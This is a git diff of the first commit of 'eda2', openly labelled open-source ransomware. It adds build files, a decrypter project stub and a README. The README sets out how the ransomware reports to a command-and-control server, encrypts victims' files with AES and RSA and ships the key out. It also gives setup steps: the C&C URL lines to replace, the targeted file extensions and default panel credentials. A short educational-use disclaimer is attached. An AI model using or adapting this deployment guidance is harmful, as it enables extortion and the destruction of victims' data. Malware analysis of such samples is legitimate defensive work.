1st import into tree

Eda2/.gitignore

@@ -0,0 +1,196 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+build/
+bld/
+[Bb]in/
+[Oo]bj/
+
+# Visual Studo 2015 cache/options directory
+.vs/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUNIT
+*.VisualState.xml
+TestResult.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+*_i.c
+*_p.c
+*_i.h
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding addin-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# TODO: Comment the next line if you want to checkin your web deploy settings 
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# NuGet Packages
+*.nupkg
+# The packages folder can be ignored because of Package Restore
+**/packages/*
+# except build/, which is used as an MSBuild target.
+!**/packages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/packages/repositories.config
+
+# Windows Azure Build Output
+csx/
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+*.[Cc]ache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.pfx
+*.publishsettings
+node_modules/
+bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+*.mdf
+*.ldf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt

Eda2/.travis.yml

@@ -0,0 +1,2 @@
+language: csharp
+solution: ./stolich/Stolich.sln

Eda2/README.md

@@ -0,0 +1,71 @@
+# eda2, Stolich, Win32.Stolich
+Open Source Ransomware
+
+Uploaded to GitHub for those who want to analyze the code.
+
+
+### References
+
+- http://www.securitynewspaper.com/2016/01/25/eda2-open-source-ransomware-code-used-real-life-attacks/
+
+
+
+                  _       ___  
+                 | |     |__ \ 
+          ___  __| | __ _   ) |
+         / _ \/ _` |/ _` | / / 
+        |  __/ (_| | (_| |/ /_ 
+         \___|\__,_|\__,_|____|
+
+It's a ransomware-like file crypter sample which can be modified for specific purposes. It's more extended version of hidden tear.
+
+**Features**
+
+* Uses both RSA and AES algorithms.
+* Coordinates with a Command&Control server.
+* Uses CSPRNG
+* Uses phplibsec
+* Encrypted files can be decrypted in decryption program with encryption key.
+* Changes desktop background.
+
+**Demonstration Video**
+
+https://www.youtube.com/watch?v=PD16u1Rz2QI
+
+**Workflow**
+
+* Program sends a POST request to the C&C server with pcname and username variables.
+* C&C server creates RSA public/private key pair. Sends public key to the program, saves private key inside the Mysql database
+* Program creates a random key for AES algorithm
+* Program encrypts files with AES algorithm
+* Program encrypts AES key with RSA public key and sends it to the C&C server with POST request
+* C&C server saves encrypted AES key inside the Mysql Database
+
+**Usage**
+
+* You need to have a web server which runs Php and Mysql. Change this line with your URL
+
+  ```
+  string generatorUrl = "http://www.example.com/panel/createkeys.php"; 
+  string keySaveUrl = "http://www.example.com/panel/savekey.php"; 
+  ```
+
+* It uses 2048 as RSA key size. You can change it
+
+  `const int keySize = 2048;`
+
+
+
+* Target file extensions can be change. Default list:
+
+  ```
+  var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png",     ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
+  ```
+
+* Edit your database settings in db.php
+* Default login credentials for web panel: username:test password:test
+* You can use Hidden Tear's decryption program to decrypt files.
+
+## Legal Warning
+
+While this may be helpful for some, there are significant risks. eda2 may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running eda2, even though you are innocent.

Eda2/antidote/hidden-tear-decrypter.sln

@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.31101.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "hidden-tear-decrypter", "hidden-tear-decrypter\hidden-tear-decrypter.csproj", "{82C19CBA-E318-4BB3-A408-5005EA083EC5}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

Eda2/antidote/hidden-tear-decrypter/App.config

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
+    </startup>
+</configuration>